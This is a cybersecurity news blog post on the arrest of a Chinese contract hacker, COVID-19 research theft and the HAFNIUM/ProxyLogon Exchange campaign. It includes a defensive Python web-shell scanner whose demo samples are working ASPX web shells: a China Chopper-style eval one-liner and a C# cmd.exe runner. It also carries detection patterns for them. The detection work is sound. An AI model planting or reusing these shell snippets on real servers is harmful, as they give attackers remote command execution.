Cyber Web Spider Blog – News
Chinese Hackers Exploit Microsoft Exchange Servers to Steal COVID-19 Research Data

Posted on July 9, 2025 by CWS

A sophisticated cyberattack orchestrated by Chinese state-sponsored hackers exposed weaknesses across the global cybersecurity infrastructure, targeting critical COVID-19 research at American universities and exploiting Microsoft Exchange servers worldwide.

The Justice Department announced the arrest of a key figure in this operation, marking a significant milestone in the fight against state-sponsored cyber espionage.

Xu Zewei, a 33-year-old Chinese national, was arrested in Milan, Italy, on July 3, 2025, following a U.S. extradition request.

The arrest represents one of the first successful captures of a hacker associated with Chinese intelligence services at the request of the FBI. Xu faces a nine-count federal indictment alongside his co-defendant Zhang Yu, who remains at large.

The charges include conspiracy to commit wire fraud, obtaining information by unauthorized access to protected computers, intentional damage to protected computers, and aggravated identity theft. If convicted on all counts, Xu could face up to 77 years in prison.

The COVID-19 Research Theft Campaign

Between February 2020 and June 2021, Xu and his associates carried out a systematic campaign to steal critical COVID-19 research from American institutions.

Working under the direction of China's Ministry of State Security (MSS) and its Shanghai State Security Bureau (SSSB), the hackers targeted U.S. universities, immunologists, and virologists engaged in developing vaccines, treatments, and testing protocols.

Court documents reveal that on February 19, 2020, Xu confirmed to his SSSB handler that he had successfully compromised the network of a research university in the Southern District of Texas.

Three days later, the SSSB officer directed Xu to specifically target email accounts belonging to virologists and immunologists conducting COVID-19 research. Xu subsequently confirmed that he had acquired the contents of those researchers' mailboxes.

The HAFNIUM Campaign

The cyber espionage operation expanded dramatically in late 2020 when Xu and his co-conspirators began exploiting zero-day vulnerabilities in Microsoft Exchange Server.

This massive campaign, publicly known as "HAFNIUM," compromised thousands of computers worldwide.

The attack chained four critical vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065), collectively known as ProxyLogon. CVE-2021-26855 is a server-side request forgery in the Exchange front end that let an unauthenticated attacker reach back-end services over port 443 as the server itself; CVE-2021-26857 is an insecure deserialization flaw in the Unified Messaging service; and CVE-2021-26858 and CVE-2021-27065 are post-authentication arbitrary file writes that, once reached through the SSRF, were used to write web shells to disk and so gain persistent access to victim systems.

The HAFNIUM group targeted over 60,000 U.S. entities, compromising more than 12,700 organizations. Victims included universities, law firms, defense contractors, and government agencies.

The attackers installed web shells on compromised servers, giving them remote access for data theft and lateral movement within victim networks. The shells were small ASPX files written into directories the Exchange front end already serves, such as aspnet_client and the OWA and ECP auth folders, so they blended in with legitimate content and survived patching until they were explicitly removed.
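As an added example, not code from the article, from Microsoft, or from any party it describes, the following Python script shows how a responder might triage an Exchange web root for ASPX web shells of the kind described above. The directory hints reflect where the 2021 shells were commonly reported (aspnet_client and the OWA/ECP auth folders under FrontEnd\HttpProxy); the indicator weights, the reporting threshold and the three sample files are this example's own constructions, not captured artifacts or a published detection rule.

```python
"""Triage an IIS / Exchange web root for ASPX web shells.

Added example for this article; not code from Microsoft, the DOJ, or the
attackers. Scoring weights, threshold and sample files are constructed.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# File types IIS executes server-side; a shell must live in one of these.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx"}

# Sub-paths (relative to the web root, lower-case, forward slashes) where the
# 2021 HAFNIUM shells were commonly reported. Assumes a default install layout.
SUSPECT_DIR_HINTS = (
    "aspnet_client",
    "frontend/httpproxy/owa/auth",
    "frontend/httpproxy/ecp/auth",
)

# (name, regex, weight): weights are this example's heuristic, not a published scheme.
INDICATORS = (
    ("jscript_page", re.compile(r'<%@\s*page\s+language\s*=\s*"?jscript"?', re.I), 3),
    ("eval_request", re.compile(r"eval\s*\(\s*Request\b", re.I), 4),
    ("unsafe_eval", re.compile(r'eval\s*\([^)]*,\s*"unsafe"\s*\)', re.I), 3),
    ("request_param", re.compile(r"Request(\.(Item|Form|QueryString))?\s*\[", re.I), 1),
    ("process_start", re.compile(r"Process\.Start|cmd\.exe", re.I), 3),
    ("file_write", re.compile(r"File\.WriteAll|\.SaveAs\(", re.I), 1),
    ("runat_server", re.compile(r'runat\s*=\s*"?server"?', re.I), 1),
)
SUSPECT_DIR_WEIGHT = 2
REPORT_THRESHOLD = 4  # benign pages score 0-1 (plus 2 for location); shells score well above


@dataclass
class Finding:
    path: str
    name: str
    score: int
    reasons: list


def score_content(text):
    """Return (score, matched indicator names) for one file's contents."""
    hits = [(name, w) for name, rx, w in INDICATORS if rx.search(text)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def in_suspect_dir(path, root):
    """True if the file sits under one of the directories the 2021 shells used."""
    rel = os.path.relpath(os.path.dirname(path), root).replace("\\", "/").lower()
    return any(hint in rel for hint in SUSPECT_DIR_HINTS)


def scan_webroot(root):
    """Walk root; return Findings for executable files that look like shells, highest score first."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read(512 * 1024)  # shells are tiny; cap reads anyway
            except OSError:
                continue
            score, reasons = score_content(text)
            if in_suspect_dir(path, root):
                score += SUSPECT_DIR_WEIGHT
                reasons.append("suspect_directory")
            if score >= REPORT_THRESHOLD:
                findings.append(Finding(path, name, score, reasons))
    return sorted(findings, key=lambda f: -f.score)


def build_demo_tree():
    """Create a constructed web root: two shell-like files and one benign page."""
    root = tempfile.mkdtemp(prefix="exch_demo_")
    samples = {
        # China Chopper-style one-liner of the kind seen in 2021, in a suspect folder.
        "aspnet_client/system_web/log.aspx":
            '<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>',
        # C# command runner outside the suspect folders: caught by content alone.
        "owa/help.aspx":
            '<%@ Page Language="C#" %><script runat="server">void Page_Load(){'
            'var p=new System.Diagnostics.Process();p.StartInfo.FileName="cmd.exe";'
            'p.StartInfo.Arguments="/c "+Request["c"];p.Start();}</script>',
        # Benign page in a suspect folder: location alone must not trigger a report.
        "aspnet_client/default.aspx":
            '<%@ Page Language="C#" %><html><body><asp:Label runat="server" Text="ok"/></body></html>',
    }
    for rel, body in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for f in scan_webroot(build_demo_tree()):
        print(f"{f.score:>3}  {f.path}  {','.join(f.reasons)}")
```

Run it against a real web root with `scan_webroot(r"C:\inetpub\wwwroot")` and the Exchange FrontEnd tree; the point of weighting both location and content is that a benign page in a suspect folder stays below the threshold while a shell dropped anywhere in the tree is still reported. Treat any hit as a lead to confirm against file creation times and HttpProxy logs, not as proof on its own.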

The Microsoft Exchange Server exploitation campaign had unprecedented global reach. By March 2021, an estimated 250,000 servers worldwide had been compromised.

The European Banking Authority, the Norwegian Parliament, and Chile's Commission for the Financial Market (CMF) were among the high-profile victims.

Microsoft released out-of-band security updates on March 2, 2021, but by then the damage was already extensive: patching closes the vulnerabilities, but it does not remove web shells already written to disk, so patched servers could remain under attacker control.

The FBI and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory warning organizations about the compromise.

In April 2021, the Justice Department carried out a court-authorized operation to remove web shells from hundreds of vulnerable computers in the United States.

State-Sponsored Operations

The investigation revealed that Xu operated as a contract hacker for Shanghai Powerock Network Co. Ltd., described by prosecutors as one of many "enabling" companies that carried out hacking operations for the Chinese government.

This network of private companies and contractors gave Beijing plausible deniability while it conducted extensive cyber espionage campaigns.

The MSS and SSSB, China's principal intelligence services, directly supervised and coordinated these operations.

The Shanghai State Security Bureau, one of the most aggressive and internationally active units of the MSS, maintains an extensive network of front companies and conducts global espionage operations.

The HAFNIUM campaign prompted a coordinated international response.

In July 2021, the United States, together with the European Union, the United Kingdom, Australia, Canada, New Zealand, Japan, and NATO, formally attributed the attacks to the Chinese government and condemned the PRC's role in malicious cyber activity.

The arrest of Xu Zewei demonstrates the continued efforts of international law enforcement to hold state-sponsored hackers accountable.

"This arrest underscores the United States' patient and tireless commitment to pursuing hackers who seek to steal information belonging to U.S. companies and universities," said John A. Eisenberg, Assistant Attorney General for the National Security Division.

The HAFNIUM group has since evolved into what security researchers now track as "Silk Typhoon," continuing to target large corporations and government entities.

The group has adapted its tactics to exploit common IT solutions, including remote management tools and cloud applications.

The case highlights the broader challenge posed by Chinese cyber operations, which U.S. officials say exceed those of all other foreign governments combined.

The Justice Department's announcement is part of a broader crackdown on Chinese cyber espionage, with several recent cases targeting individuals accused of working for Beijing's intelligence services.

As Xu awaits extradition proceedings in Italy, the case serves as a stark reminder of the persistent threat posed by state-sponsored cyber operations and the critical importance of international cooperation in combating these sophisticated attacks on global cybersecurity infrastructure.
